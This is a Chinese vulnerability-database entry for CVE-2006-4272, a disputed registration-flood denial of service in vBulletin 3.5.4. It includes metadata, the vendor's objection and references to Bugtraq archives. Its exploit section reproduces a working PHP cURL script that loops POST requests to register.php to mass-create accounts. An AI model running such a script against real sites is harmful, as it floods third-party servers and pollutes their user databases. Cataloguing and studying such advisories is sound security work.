Jelsoft vBulletin 'register.php'拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193772 漏洞类型 未知
发布时间 2006-08-21 更新时间 2006-08-26
CVE编号 CVE-2006-4272 CNNVD-ID CNNVD-200608-336
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-336
|漏洞详情
**有争议**JelsoftvBulletin3.5.4中,远程攻击者可借助对register.php脚本的大量请求来注册多个任意用户,并触发拒绝服务攻击(资源消耗型)。注:厂商对此漏洞存在争议,声称"如果启用了CAPTCHA,注册就不会通过.........如果你们谈论的是存在泛洪攻击,那么这理应是服务器级要解决的问题。"
|漏洞EXP
####################### vBulletin Version 3.5.4 #########################

Script     : vBulletin Version 3.5.4

site       : www.vbulletin.com

Exploit by : x-boy

E-mail     : Dicomdk (at) gmail (dot) com [email concealed]

Type       : Registration flood in register.php

Thanks to  : Simo64

########################################################################
#

Code of exploit (For english version , you can change it to other language)=> exploit.php

cURL Must be activated  (http://curl.haxx.se)

Sorry for my bad English :-)

########################################################################
#

<?

set_time_limit(60);

//You can change 10 to other numbers

for($i = 1 ; $i <= 10 ; $i++)

{

//to put curl to send POST request

$ch = curl_init();

//change http://localhost/vb3 to the url of the script

curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');

curl_setopt($ch , CURLOPT_POST , 1) ;

curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5
=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordcon
firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm
ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');

curl_exec($ch);

curl_close($ch);

}

//Flood finished  good luck

?>

########################################################################
##
|参考资料

来源:BUGTRAQ
名称:20060815UPDATEvBulletinVersion3.5.4exploit
链接:http://www.securityfocus.com/archive/1/archive/1/443648/100/0/threaded
来源:BUGTRAQ
名称:20060818Re:UPDATEvBulletinVersion3.5.4exploit
链接:http://archives.neohapsis.com/archives/bugtraq/2006-08/0381.html
来源:SREASON
名称:1426
链接:http://securityreason.com/securityalert/1426